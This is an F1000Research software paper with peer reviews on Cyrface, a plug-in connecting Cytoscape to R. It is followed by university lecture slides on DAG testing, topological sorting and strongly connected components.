cited. Data associated with the article are available under the terms of the Creative Commons Zero "No rights reserved" data waiver (CC0 1.0 Public domain dedication). Grant information: We acknowledge with thanks the financial support from the EU through the project "BioPreDyn" (ECFP7-KBBE-2011-5 Grant number 289434). The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Introduction The availability of high-throughput experimental data has led to the development of multiple computational methods to analyse these data. Arguably, one of the most used environments is the statistical programming language R. Multiple R packages for computational biology and bioinformatics are available in various resources such as the Comprehensive R Archive Network (CRAN). Furthermore, Bioconductor provides a comprehensive collection of packages to analyse biological data developed in R. These packages are subject to stringent quality control in terms of functionality and documentation. It is an open-source project hosting 671 active and curated software packages as of September 2013. For those not familiar with computational programming, learning R and running packages can be a time consuming task and therefore the use of intuitive graphical interfaces can enhance the usability of the tool. Cytoscape is a Java open-source framework with an intuitive graphical interface devoted to the visualization and analysis of networks. It is arguably one of the most used tools in bioinformatics, and has a variety of plug-ins to solve numerous computational biology problems. Therefore, we developed Cyface, a plug-in for Cytoscape that facilitates an interface between any R package and Cytoscape. Cyface is designed to integrate the major strengths of R and Cytoscape environments by providing a general Java to R interface. By linking these two environments, Cyface allows one to use Cytoscape as a user interface for R packages and Cytoscape plug-ins in order to reach the wealth of methods implemented in R. Workflow management systems such as Taverna and Galaxy can call R packages from a graphical user interface (GUI)-based interface. Taverna is a standalone Java open-source tool for the general development and execution of workflows. Galaxy is an open-source web-platform to assemble workflows based on genomic experimental data analysis. Thus, Cyface complements Taverna and Galaxy by enhancing GUIs for R within a different environment with complementary features. RCytoscape is another tool that exists to link R and Cytoscape. It is a Bioconductor R package that establishes a connection between R and Java in the opposite direction of Cyface: it supports the connection from R to Java, whereas Cyface allows a connection from Java to R. A typical use of RCytoscape is to handle experimental data from R and transfer the biological network to Cytoscape while controlling it within R. Hence, RCytoscape and Cyface provide complementary features. This paper is structured as follows: Firstly, we provide a description of the implementation of Cyface. Then, to illustrate the applicability of Cyface, we show two existing packages, CytoCopteR and DrugVsDisease (DvD), that make use of Cyface, and we create a simplified version of the DataRail workflow to process and visualize experimental data using methods available in R. Finally, we discuss on-going and future developments. Implementation Cyface is a Java open-source framework developed to establish the connection between Cytoscape and R. Interaction between these two different environments (invoking R within Java) is not natively supported by Java. Therefore, to achieve this Cyface uses the external libraries RCaller (https://code.google.com/p/rcaller/) and Rserve (http://www.rforge.net/Rserve/). On the one hand, to support the communication between Java and R, RCaller uses an R package called Runiversal that converts the R objects into an XML format, thus allowing the R objects to be read by Java. On the other hand, Rserve establishes a TCP/IP server allowing other programs from various languages to connect to an R session and access its features. Rserve is currently being used by several mature projects, among them the Taverna workflow management system. Support for Rserve and RCaller libraries in Cyface is implemented by the RserveHandler and RCallerHandler Java classes, respectively. Both classes extend the abstract class RHandler that contains the signature of all the necessary methods to establish and maintain a connection with R. Figure 1 depicts the hierarchical structure of the Java classes responsible for handling the connection between Java and R. Moreover, it depicts the connection points between these two different environments. Cyface software architecture can be extended to support other Java libraries that facilitate the connection between Java and R. Thereby, this structure allows one to take advantage of particular strengths of different libraries and to adapt to particular requirements of the users, for instance execute R commands automatically without requiring first to manually initiate an R session. Cyface uses another Cytoscape plug-in termed CommandTool. CommandTool offers the users the ability to script basic commands in Cytoscape, such as import, display or modify networks through a simple command line. The integration allows the users to use the simple command line of CommandTool to execute R commands within Cytoscape and visualise directly the output. On Cyface’s homepage (http://www.ebi.ac.uk/saezrodriguez/cyface/) we provide an example using the CommandTool console to plot several characteristics of the iris data set using the ggplot2 plotting library: ![Diagram of the Cyface interaction layer with R.](image) Figure 2. The Cyface implementation of the DataRail workflow. The rounded rectangles represent the MIDAS files containing the experimental data at a given state. Hexagon nodes represent functions such as load or normalise. Green identifies steps that were successfully executed and grey identifies those that were not run yet. Results and discussion A typical use of Cyrface is to provide a graphical user interface to R packages within Cytoscape. Cyrface is currently being used by two Cytoscape plug-ins, CytoCopteR\(^{10}\) and DvD\(^{11}\). CytoCopteR\(^{10}\) provides a simple step-by-step interface allowing users without any experience in R to use the CellNOptR (www.cellnopt.org) package and handle the input and output networks in Cytoscape. CellNOptR is an open-source software package that provides methods for building predictive logic models from signalling networks using experimental measurements. DvD\(^{11}\), Drug vs. Disease, is an R package that provides a workflow for the comparison of drug and disease gene expression profiles. It provides dynamic access to databases, such as Array Express\(^{14}\), to compare drug and disease signatures to generate hypotheses of drug-repurposing. The packages mentioned above are two examples of the usefulness of Cyrface in capturing the strengths of two environments. On one side, R provides a wealth of bioinformatics and biostatistics packages with very comprehensive resources such as Bioconductor and CRAN. On the other side, Cytoscape facilitates a user-friendly graphical interface for network visualisation and analysis, complemented with a variety of plug-ins addressing different computational biological problems. Cyrface links these two environments by providing a way to develop user-friendly interfaces for R packages by embedding them within Cytoscape. As an illustrative example, Cyrface provides a simple version of the DataRail\(^{12}\) workflow using methods implemented in R. DataRail is an open-source MATLAB toolbox that handles experimental data in a tabular format and provides methods to maximize and extract information using internal or external tools. Saez-Rodriguez et al.\(^{12}\) also proposed an experimental data storing format termed Minimum Information for Data Analysis in Systems Biology (MIDAS). This is a tabular format based upon the minimum-information standards that specifies the layout of experimental data files. A typical use of DataRail is to import, store and process the input information from instruments using the MIDAS format, and export it to other MIDAS compliant software. The simplified version of the DataRail workflow implemented in Cyrface is structured in several sequential steps that allows the users to import, normalise and visualise experimental data-sets stored in the MIDAS format (see Figure 2). At any stage the users are able to export and visualise the transformed data set. An extension to the workflow was subsequently added to support the CellNOptR\(^{10}\) model training function. CellNOptR uses the experimental data and a corresponding prior-knowledge network to generate a logic model and train it to maximise the fit with the experimental measurements. Thereby, through an intuitive graphical interface, users are able to visualise a biological network, modify it and use it to assess the quality of the fit with a corresponding data set of experimental data. The workflow supports any network format that is supported by Cytoscape, for example the SIF format. Moreover, the workflow was extended to support the Systems Biology Markup Language (SBML) Qualitative Models (Qual) format\(^{15}\). SBML Qual is an extension of the SBML level 3 standard and is proposed to provide a standard representation for logic and qualitative models of biological networks. The latest specification document for SBML Qual can be found on the package homepage (http://sbml.org/Documents/Specifications/SBML_Level_3/Packages/Qualitative_Models_(qual)). Support for importing models stored in SBML Qual format is achieved using the jSBML library\(^{16}\) and the respective SBML Qual package. Supplementary material 1 provides a step-by-step tutorial and an example on how to use the workflow. Conclusions Here, we present Cyrface, a bioinformatics Java library that provides a general interaction between Cytoscape and R. Cyrface offers a way to combine a friendly graphical interface within the Cytoscape environment with any R package. A GUI should benefit beginners and occasional users; as well as being useful for training and illustration purposes, it extends the accessibility of the tool to those not familiar with the R command line interface. The Cyrface homepage (http://www.ebi.ac.uk/saezrodriguez/cyrface/) contains the link to download Cyrface, and installation and user-guide instructions. A few examples demonstrating the usefulness of the tool and the different supported libraries are also shown and explained. The source-code of Cyrface is publicly available on its Sourceforge webpage (https://sourceforge.net/projects/cyrface/) and permanently available on 10.5281/zenodo.7096. Future features for Cyrface will include the extension to the new version of Cytoscape, Cytoscape 3, and improvements to the DataRail workflow. These will include increasing its modularity and supporting other features, such as cutting and selecting specific regions of the data. Software Details Homepage: http://www.ebi.ac.uk/saezrodriguez/cyrface/. Source code: https://sourceforge.net/projects/cyrface/. License: GNU General Public License version 3.0 (GPLv3). Author contributions JSG initiated and guided the project. EG designed the software architecture and implemented Cyrface. EG and JSG wrote the paper. Competing interests No competing interests were disclosed. Grant information We acknowledge with thanks the financial support from the European Union through the project “BioPreDyn” (ECFP7-KBBE-2011-5 Grant number 289434). The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Acknowledgements The authors would like to thank Martijn Van Iersel for helpful discussions and suggestions in the earlier stages of Cyrface development. Supplementary materials Cyrface – Tutorial Installation: 1. Go to Cyrface homepage: http://www.ebi.ac.uk/saezrodriguez/cyrface/ 2. Follow the installation instructions; Cyrface's DataRail walkthrough: 1. To start Cyrface’s DataRail workflow go to “Plugin -> Cyrface -> DataRail” 2. The full workflow should now be visible. 3. Right-click on the top MIDAS node and then select “Set MIDAS file...” to select the desired MIDAS file. After the MIDAS file is selected the node should turn green. 4. Right-click on “Load MIDAS” and then select “Load MIDAS...” option to load the previously selected MIDAS file. After the file is loaded the node should turn green. 5. After the MIDAS file is successfully loaded the second MIDAS node is now green showing that it’s ready to be normalized or visualized. 6. Right-click on the respective MIDAS node and the selecting the “Plot MIDAS...” option will pop-up a plot of the data (the plot can be exported following “File -> Save R plot...” 7. Right-click on the “Normalize” node to run the normalization function. A pop-up window will show up to allow the user to define the Normalization function arguments: a. **EC50Data**: parameter for the scaling of the data between 0 and 1, default=0.5 b. **Detection**: minimum detection level of the instrument, everything smaller will be treated as noise (NA), default to 0 c. **Saturation**: saturation level of the instrument, everything over this will be treated as NA, default to Inf 8. After normalizing the MIDAS file it can be plotted as previously and/or exported. Cyrface’s DataRail Workflow is also linked to the CellNOptR R package allowing the users to optimize a selected prior knowledge network against the just normalized MIDAS file. 9. Right-click on the “Optimize” node and select “Optimize…” function will pop-up a file browser to select the model file. Both Sif and SBML-qual formats are supported. 10. The optimization may take awhile and it’s executed using the defaults values defined in CellNOptR. 11. Right-click on the “Optimized CNO List” will show how well the optimized model fit the data. 12. For more details about the normalization function and the optimization method please visit CellNOptR package in Bioconductor or CellNOpt homepage b. http://www.cellnopt.org/ Open Peer Review Current Referee Status: ✔️ ❓ ✔️ Version 1 Referee Report 20 January 2014 doi:10.5256/f1000research.2371.r1863 Paul T. Shannon Computational Biology, Fred Hutchinson Cancer Research Institute, Seattle, WA, USA Cyrface is a welcome addition to the Cytoscape ecosystem; nicely complementary to RCytoscape. My only reservation is one which applies to my own work (the aforementioned RCytoscape), indeed as well as all parts of the Cytoscape ecosystem. My reservation has two parts: First: network biology is in its infancy and as such experimental data are woefully incomplete. Molecular interactions are stochastic, contingent and often very short-lived yet it is exactly these molecular interactions that we need to understand in order to predict and control cellular activity in health and disease. Second: it is (and may remain) unusual to find researchers, much less clinicians, who are adept at both programming and biomedicine. These two disciplines seem to select for, and then reinforce, different styles of thinking. Therefore progress in this field (call it network biology, or systems biology, or integrative biomedicine) requires hybrid teams: some who are very strong in biological and/or clinical sensibilities and some who are strong in computation and data analysis. Such a hybrid team, at its best, stays together long enough for mutual understanding and communication to emerge, as in the "trading language" which emerged in the world of particle physics in and around linear accelerators in the 60's (see Peter Galison's "Image and Logic"). I worry about the following scenario for Cyrface: a capable programmer hooks up the latest and greatest Bioc conductor package to Cytoscape, exposes as best they can the parameterizations offered by that package, and turns the tool over to their collaborating biologist. Experimental data is loaded and analyses or simulations run. Puzzles and inconclusive results will inevitably emerge, requiring detailed knowledge of both the strengths and weaknesses of the Bioc package. With good luck, perseverance and good data, this small working team may in time settle on a satisfactory Cyrface tool which can be reused without the constant intervention of the programmer. This will last until new data is acquired, upsetting the equilibrium, and the hybrid style of work and the back-and-forth between biologist and programmer, begins anew. I say that I worry about this scenario. It may be exactly the intended use of Cyrface; the problem it is intended to solve. But this essentially sociological characteristic (requirement?) of Cyrface is not described in the paper. I think that those of us who create bioinformatics software tend to avoid being explicit about this - and I think that this (the social & collaborative requirements of bioinformatic research) deserves a lot more attention. If indeed network biology, as I claim, is in its infancy, then it may be helpful if the ecosystem of Cytoscape-related tools are considered from this perspective. I suspect that the conclusions we might all (mostly) agree upon are: 1. User-friendly exploration of data-rich networks in a web browser (as with cytoscape.js) will become increasingly popular. 2. That user-friendliness often competes with analytical nuance and close scrutiny - biologically and clinically useful results become less likely. 3. Cyrface's connection of Cytoscape to R is a great step in the right direction, marrying as it does user-friendliness with some new analytical power in a way that is nicely complementary to Cytoscape java plugins and Cytoscape access to web services. Thus, Cyrface is a good step in the right direction. The next steps, it seems to me, include: 1. Providing easy connections to R (python, C++) analyses for cytoscape.js 2. A standard mechanism whereby scripts (R, python, Ruby, Perl) upon execution, can start up a Cytoscape or cytoscape.js session, customize it with networks, functions, buttons and menus, and with both public and laboratory data. As a generalization of Cyrface, this mechanism would encourage the rapid expansion of Cytoscape capabilities. These possible next steps carry on in the spirit of Cyrface, RCytoscape, and Cytoscape3 apps, and will promote the creation of, and sharing of, custom network analyses, shared tools, and lead to fruitful collaborations across the hybrid community of biologists, physicians and programmers. **Competing Interests:** No competing interests were disclosed. I have read this submission. I believe that I have an appropriate level of expertise to confirm that it is of an acceptable scientific standard. --- **Ghislain Bidaut** Integrative Bioinformatics, Inserm, Centre de Recherche en Cancérologie de Marseille, Marseille, France The paper is well written, however, many items require clarification: 1. My main criticism is the initial need to install several packages (RCaller, Rserve, Runiversal, Java, etc...), plus Cytoscape and the CommandTool plugin. Since I did not know if this would break my personal configuration or if I would be able to uninstall it, I was not able to perform the whole installation myself. It would be great if the authors could provide a virtual machine image with all the software preloaded so that one can try it out of the box without installation. I know by experience that cityscape plugins tend to work only with a single version of Cytoscape, so a clear list of all the required versions in the paper itself would be very useful. 2. The number of packages we are dealing with is very confusing. I am also afraid that with such a large number of dependencies, the program may break after any update. 3. In the Implementation section, the authors mention the "iris dataset". It would be useful to define what this is. It is also mentioned in the documentation but it is still unclear what the authors are referring to. The documentation shows an example where the ggplot2 package is used to plot "petal". Could the authors please define what this is? 4. Figure 2: It would be useful to define more accurately what type of data we are looking at here (e.g. gene expression?). 5. In the discussion, several R packages are mentioned (DvD, Cytocopter), what are their links with the present software other than the fact that they run under R? Is it really possible to interact with them from Cytoscape? If so, the proper documentation or a tutorial should be provided. It would also be useful if an actual example using DvD along interaction data, could be shown. 6. I do not understand the example with DataRail. The usefulness of the example given is not clear to me since it seems that no interaction data is given (for me this is the main purpose of Cytoscape). A useful example for most users might be: - A network of protein-protein interaction (PPI) data in Cytoscape. - Some expression data in R (an exprs object for instance). An example of a question might be "How to superimpose the expression data and generate a proper network attribute from it?" **Competing Interests:** No competing interests were disclosed. I have read this submission. I believe that I have an appropriate level of expertise to confirm that it is of an acceptable scientific standard, however I have significant reservations, as outlined above. Referee Report 09 October 2013 doi:10.5256/f1000research.2371.r1866 Nikolaus Schultz ¹, B. Arman Aksoy ² ¹ Computational Biology Center, Memorial Sloan-Kettering Cancer Center, New York, NY, USA ² Memorial Sloan-Kettering Cancer Center, New York, NY, USA In this manuscript, the authors describe the Cytoscape plugin Cyrface. Cyrface consists of two components: 1) a Java API, which is already being used by the Cytoscape plugins CytoCopterR and DrugysDisease (both developed by the same group), and 2) a graphical user interface that connects R to Cytoscape. As a proof-of-concept to what kind of applications can be built on top this interface, the plugin also supports the MIDAS and SBML-Qual formats. The article is well written and the tool is useful to the community. However, we recommend the following changes to the article to make it more appealing to potential future users: 1. As the new version of the Cytoscape (3.x) is becoming more widely used by the community, the authors should explicitly state that they are targeting version 2.8 with this framework. This will reduce the confusion for users who are not as familiar with Cytoscape. 2. The tutorial in the supplementary materials helps to understand the general use case for this plug-in, but the lack of downloadable “sample” files for this example will make it harder for users to learn how to use the DataRail pipeline. We think it is important to provide example files that people can use for reproducing the figures in the manuscript. 3. The Cyrface interaction layer with R looks helpful for programmers, but can the authors comment on how these classes are different from the default Java implementations of the R Serve clients, e.g. http://rforge.net/RServe? This will help clarify why people should use Cyrface for their next project. 4. The command line interface (commandTool) appears to be useful; but it seems that it is only capable of running commands in an isolated environment, with each command having its own session. If this is the case, can the authors comment on what the advantage of running R commands from the commandTool is compared to initiating a terminal window and running commands directly from an R shell? Are users able to, for example, pass node/edge attribute fields to the corresponding R commands? 5. It looks like the current implementation does not support setting a different R Serve location other than localhost. Although not necessary, if users are given the option to set a different R Serve address within the plug-in, this will further lower the barrier for users who are not experienced with R to use Cyrface, where they can use a pre-installed R serve hosted on a different machine. **Competing Interests:** No competing interests were disclosed. *We have read this submission. We believe that we have an appropriate level of expertise to confirm that it is of an acceptable scientific standard.* --- The benefits of publishing with F1000Research: - Your article is published within days, with no editorial bias - You can publish traditional articles, null/negative results, case reports, data notes and more - The peer review process is transparent and collaborative - Your article is indexed in PubMed after passing peer review - Dedicated customer support at every stage For pre-submission enquiries, contact research@f1000.com
{"Source-Url": "https://f1000researchdata.s3.amazonaws.com/manuscripts/2371/9d2500ab-bd79-4b00-95c8-e2450acd5741_2163%20-%20Emanuel%20Goncalves.pdf?doi=10.12688/f1000research.2-192.v1", "len_cl100k_base": 5926, "olmocr-version": "0.1.51", "pdf-total-pages": 14, "total-fallback-pages": 0, "total-input-tokens": 35070, "total-output-tokens": 7733, "length": "2e12", "weborganizer": {"__label__adult": 0.00034165382385253906, "__label__art_design": 0.0004906654357910156, "__label__crime_law": 0.0004193782806396485, "__label__education_jobs": 0.0027923583984375, "__label__entertainment": 0.00020515918731689453, "__label__fashion_beauty": 0.0002366304397583008, "__label__finance_business": 0.0006551742553710938, "__label__food_dining": 0.0004897117614746094, "__label__games": 0.0008077621459960938, "__label__hardware": 0.0016145706176757812, "__label__health": 0.0018873214721679688, "__label__history": 0.0004227161407470703, "__label__home_hobbies": 0.0002663135528564453, "__label__industrial": 0.0006127357482910156, "__label__literature": 0.0003657341003417969, "__label__politics": 0.00035071372985839844, "__label__religion": 0.0005354881286621094, "__label__science_tech": 0.388427734375, "__label__social_life": 0.00036454200744628906, "__label__software": 0.11981201171875, "__label__software_dev": 0.477783203125, "__label__sports_fitness": 0.00055694580078125, "__label__transportation": 0.0004744529724121094, "__label__travel": 0.00026679039001464844}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 31185, 0.02516]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 31185, 0.25824]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 31185, 0.87638]], "google_gemma-3-12b-it_contains_pii": [[0, 1745, false], [1745, 3050, null], [3050, 8434, null], [8434, 8761, null], [8761, 14745, null], [14745, 15733, null], [15733, 16313, null], [16313, 16763, null], [16763, 17116, null], [17116, 20500, null], [20500, 23343, null], [23343, 26190, null], [26190, 28909, null], [28909, 31185, null]], "google_gemma-3-12b-it_is_public_document": [[0, 1745, true], [1745, 3050, null], [3050, 8434, null], [8434, 8761, null], [8761, 14745, null], [14745, 15733, null], [15733, 16313, null], [16313, 16763, null], [16763, 17116, null], [17116, 20500, null], [20500, 23343, null], [23343, 26190, null], [26190, 28909, null], [28909, 31185, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 31185, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 31185, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 31185, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 31185, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 31185, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 31185, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 31185, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 31185, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 31185, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 31185, null]], "pdf_page_numbers": [[0, 1745, 1], [1745, 3050, 2], [3050, 8434, 3], [8434, 8761, 4], [8761, 14745, 5], [14745, 15733, 6], [15733, 16313, 7], [16313, 16763, 8], [16763, 17116, 9], [17116, 20500, 10], [20500, 23343, 11], [23343, 26190, 12], [26190, 28909, 13], [28909, 31185, 14]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 31185, 0.0]]}
olmocr_science_pdfs
2024-12-03
2024-12-03
574ac17afa6e0a2430025505e89bed326bf3a918
CS 341: ALGORITHMS Lecture 16: graphs – topological sort, DAG testing, strongly connected components Slides by Trevor Brown (some material from Doug Stinson) trevor.brown@uwaterloo.ca (http://tbrown.pro) DFS APPLICATION: TESTING WHETHER A GRAPH IS A DAG A directed graph $G$ is a directed acyclic graph, or DAG, if $G$ contains no directed cycle. Lemma 6.7 A directed graph is a DAG if and only if a depth-first search encounters no back edges. Proof. (⇒): Any back edge creates a directed cycle. Back edge: points to an ancestor in the DFS forest • Case ($\leftarrow$): Suppose $\exists$ directed cycle. Show $\exists$ back edge. • Let $v_1, v_2, \ldots, v_k, v_1$ be a directed cycle • WLOG let $v_1$ be earliest discovered node in the cycle Consider edge $\{v_k, v_1\}$ Since $d[v_1] < d[v_k]$, $\{v_k, v_1\}$ must be a **back** or **cross** edge. Why? So when $v_1$ is discovered, $v_2, \ldots, v_k$ are all white Recall: nodes become **gray** *when discovered* Recall: every node $v_i$ that is *white-reachable* from $v_1$ when we discover $v_1$ (call $DFSVisit(v_1)$) turns **black** before $v_1$ ($f[v_i] < f[v_1]$) So $v_k$ must turn black **before** $v_1$, and we have $f[v_k] < f[v_1]$. Thus, $\{v_k, v_1\}$ must be a **back edge**. QED - **edge type** - tree - forward - back - cross - **discovery/finish times** - $d[v_k] < d[v_1] < f[v_1] < f[v_k]$ When we observe an edge from $u$ to $v$, check if $v$ is gray. Lemma 6.7 A directed graph is a DAG if and only if a depth-first search encounters no back edges. - Search for back edges - How to identify a back-edge? <table> <thead> <tr> <th>edge type</th> <th>colour of $v$</th> <th>discovery/finish times</th> </tr> </thead> <tbody> <tr> <td>tree</td> <td>white</td> <td>$d[u] &lt; d[v] &lt; f[v] &lt; f[u]$</td> </tr> <tr> <td>forward</td> <td>black</td> <td>$d[u] &lt; d[v] &lt; f[v] &lt; f[u]$</td> </tr> <tr> <td>back</td> <td>gray</td> <td>$d[v] &lt; d[u] &lt; f[u] &lt; f[v]$</td> </tr> <tr> <td>cross</td> <td>black</td> <td>$d[v] &lt; f[v] &lt; d[u] &lt; f[u]$</td> </tr> </tbody> </table> Algorithm: $DFS(G)$ $DAG \leftarrow \text{true}$ for each $v \in V(G)$ \[ \begin{align*} \text{do} & \quad \{ \text{colour}[v] \leftarrow \text{white} \\ & \qquad \{ \pi[v] \leftarrow \emptyset \\ & \quad \text{time} \leftarrow 0 \\ \text{do} & \quad \text{if } \text{colour}[v] = \text{white} \\ & \qquad \text{then } DFSvisit(v) \\ \text{return } (DAG) \end{align*} \] Algorithm: $DFSvisit(v)$ $colour[v] \leftarrow \text{gray}$ $time \leftarrow time + 1$ $d[v] \leftarrow time$ comment: $d[v]$ is the discovery time for vertex $v$ for each $w \in Adj[v]$ \[ \begin{cases} \text{if } colour[w] = \text{white} \\ \quad \text{then } \\ \quad \quad \pi[w] \leftarrow v \\ \quad \quad DFSvisit(w) \end{cases} \] if $colour[w] = \text{gray}$ then $DAG \leftarrow \text{false}$ $colour[v] \leftarrow \text{black}$ $time \leftarrow time + 1$ $f[v] \leftarrow time$ Back edge found! So we set DAG = false TOPOLOGICAL SORT Finding node orderings that satisfy given constraints **Example problem:** getting dressed in the morning **Example solution:** - **Pants before belt** - **Socks before shoes** - **Watch any time** **Diagram notes:** - Edge \( \{u, v\} \) means \( u \) must be completed before \( v \) - Could do various things first. Which ones are possible? What do they have in common? Topological sort Try to order nodes linearly so there are only pointers from left to right! IFF there is a (directed) cycle! Might not be possible! How can this happen? Try to order nodes linearly so there are only pointers from left to right! Goal: output a serial order of tasks that can be run without worrying about dependencies (because all dependencies are already satisfied by the time a task is run). (Nodes are numbered according to one such order.) Can even schedule tasks to run in parallel! Can do 1||2 then 3||13 then 4||5||15 etc. A directed graph $G = (V, E)$ has a **topological ordering**, or **topological sort**, if there is a linear ordering $<$ of all the vertices in $V$ such that $u < v$ whenever $uv \in E$. Lemma 6.5 A DAG contains a vertex of indegree 0. Proof. Suppose we have a directed graph in which every vertex has positive indegree. Let \( v_1 \) be any vertex. For every \( i \geq 1 \), let \( v_{i+1}v_i \) be an arc. In the sequence \( v_1, v_2, v_3, \ldots \), consider the first repeated vertex, \( v_i = v_j \) where \( j > i \). Then \( v_j, v_{j-1}, \ldots, v_i, v_j \) is a directed cycle. One of these must be repeated. So there is a cycle! Theorem 6.6 A directed graph $D$ has a topological sort if and only if it is a DAG. Proof. $(\Rightarrow)$: Suppose $D$ has a directed cycle $v_1, v_2, \ldots, v_j, v_1$. Then $v_1 < v_2 < \cdots < v_j < v_1$, so a topological ordering does not exist. $(\Leftarrow)$: Suppose $D$ is a DAG. Then the algorithm below constructs a topological ordering. We call a node with indegree 0 a **source**. So this step is enqueueing all source nodes. Source nodes have no unsatisfied dependencies (are ready to be added to the topological sort). If we create a new source, enqueue it. EXAMPLE (Kahn’s Algorithm) Compute **indegree** for all vertices For each **u** in **V** For each **w** in **adj(u)** **w.deg** = **w.deg** + 1 Sources go into the queue Until **Q** is empty: pop, output that element, decrement its neighbours, enqueue new sources Algorithm: *Kahn(D)* - **compute** \( \text{deg}^- (v) \) for all vertices \( v \) - **for all** \( v \) such that \( \text{deg}^- (v) = 0 \), **insert** \( v \) into a queue \( Q \) - **for** \( i \leftarrow 1 \) **to** \( n \) - **if** \( Q \) is empty - **then return** \( () \) - **else** - **let** \( v \) be the first vertex in \( Q \) - **remove** \( v \) from \( Q \) and **output** \( v \) - **for all** \( w \) in \( \text{Adj}(v) \) - **do** - **if** \( \text{deg}^- (w) = 0 \) - **then** **insert** \( w \) into \( Q \) - \( \text{deg}^- (w) \leftarrow \text{deg}^- (w) - 1 \) **Running time with adjacency lists?** - Total \( O(n + m) \) - **iterations** \( O(n) \) - **per check** \( O(1) \) - **top()** \( O(1) \) - **dequeue()** \( O(1) \) - \( \sum \text{deg}(w) = m \) - **inside loop** \( O(1) \) **Total** \( O(n + m) \) TOPOLOGICAL SORT VIA DFS - We can also implement topological sort by using **DFS**! - The **finishing times** of nodes help us - Understanding this algo will be **key** for understanding **strongly connected components** Lemma 6.8 Suppose $D$ is a DAG. Then $f[v] < f[u]$ for every arc $uv$. <table> <thead> <tr> <th>edge type</th> <th>colour of $v$</th> <th>discovery/finish times</th> </tr> </thead> <tbody> <tr> <td>tree</td> <td>white</td> <td>$d[u] &lt; d[v] &lt; f[v] &lt; f[u]$</td> </tr> <tr> <td>forward</td> <td>black</td> <td>$d[u] &lt; d[v] &lt; f[v] &lt; f[u]$</td> </tr> <tr> <td>back</td> <td>gray</td> <td>$d[u] &lt; d[v] &lt; f[v] &lt; f[u]$</td> </tr> <tr> <td>cross</td> <td>black</td> <td>$d[v] &lt; f[v] &lt; d[u] &lt; f[u]$</td> </tr> </tbody> </table> Recall from DAG-testing: there are no back edges in a DAG. Theorem: if $D$ is a DAG, and we order vertices in reverse order of finishing time, then we get a topological ordering! To see why, suppose $D$ is a DAG and we order nodes in this way, so $f_{v_1} > f_{v_2} > \cdots > f_{v_{n-1}} > f_{v_n}$. For contradiction, suppose a right-to-left edge $\{u, v\}$ exists. Since edge $\{u, v\}$ exists, the lemma implies $f_v < f_u$. But this contradicts the node ordering! So all edges are left-to-right, hence this is a topological sort. Algorithm: $DFS(G)$ 1. InitializeStack($S$) 2. $DAG \leftarrow true$ 3. For each $v \in V(G)$ - $colour[v] \leftarrow white$ - $\pi[v] \leftarrow \emptyset$ - $time \leftarrow 0$ 4. For each $v \in V(G)$ - If $colour[v] = white$ - Then $DFSvisit(v)$ 5. If $DAG$ then return $(S)$ else return $(DAG)$ Algorithm: DFSvisit(v) \[ colour[v] \leftarrow \text{gray} \] \[ time \leftarrow time + 1 \] \[ d[v] \leftarrow time \] comment: \( d[v] \) is the discovery time for vertex \( v \) for each \( w \in Adj[v] \) \[ \begin{cases} \text{if} \ colour[w] = \text{white} \\ \quad \text{then} \quad \{ \\ \quad \quad \pi[w] \leftarrow v \\ \quad \quad \text{DFSvisit}(w) \\ \quad \} \text{if} \ colour[w] = \text{gray} \quad \text{then} \quad \text{DAG} \leftarrow \text{false} \end{cases} \] \[ colour[v] \leftarrow \text{black} \] \[ \text{Push}(S, v) \] \[ time \leftarrow time + 1 \] \[ f[v] \leftarrow time \] Running time \( O(n + m) \) with adjacency lists We are pushing smallest finishing times first into a stack, so when we pop them out, we will get largest finishing time first Save each node when it finishes The initial calls are \(\text{DFSvisit}(1)\), \(\text{DFSvisit}(2)\) and \(\text{DFSvisit}(3)\). The discovery/finish times are as follows: <table> <thead> <tr> <th>(v)</th> <th>(d[v])</th> <th>(f[v])</th> </tr> </thead> <tbody> <tr> <td>1</td> <td>1</td> <td>4</td> </tr> <tr> <td>2</td> <td>5</td> <td>9</td> </tr> <tr> <td>3</td> <td>11</td> <td>12</td> </tr> </tbody> </table> <table> <thead> <tr> <th>(v)</th> <th>(d[v])</th> <th>(f[v])</th> </tr> </thead> <tbody> <tr> <td>4</td> <td>6</td> <td>7</td> </tr> <tr> <td>5</td> <td>8</td> <td>9</td> </tr> <tr> <td>6</td> <td>2</td> <td>3</td> </tr> </tbody> </table> The topological ordering is 3, 2, 5, 4, 1, 6 (reverse order of finishing time). I renamed "my documents" on your computer to "our documents". You haven't texted me in 1 minute and 42 seconds. Why are you ignoring me? Strongly connected components. These are called strongly connected components (SCCs) STRONGLY CONNECTED COMPONENTS - It could also be divided into **three graphs**... - But we want our SCCs to be **maximal** (as large as possible) STRONGLY CONNECTED COMPONENTS • So, the goal is to find these (maximal) SCCs: FORMAL DEFINITIONS For two vertices $x$ and $y$ of $G$, define $x \sim y$ if $x = y$; or if $x \neq y$ and there exist directed paths from $x$ to $y$ and from $y$ to $x$. The relation $\sim$ is an **equivalence relation**. The **strongly connected components** of $G$ are the equivalence classes of vertices defined by the relation $\sim$. A strongly connected component of a digraph $G$ is a maximal strongly connected subgraph of $G$. Note: a connected component can contain just a **single node**. Example: a node with no out-edges. Consider this graph. These are its SCCs. The following is its component graph. It has one node for each SCC. And an edge between two nodes IFF there is an edge between the corresponding SCCs. Can there be a cycle in the component graph? No! If there are paths both ways between components, they are actually the same 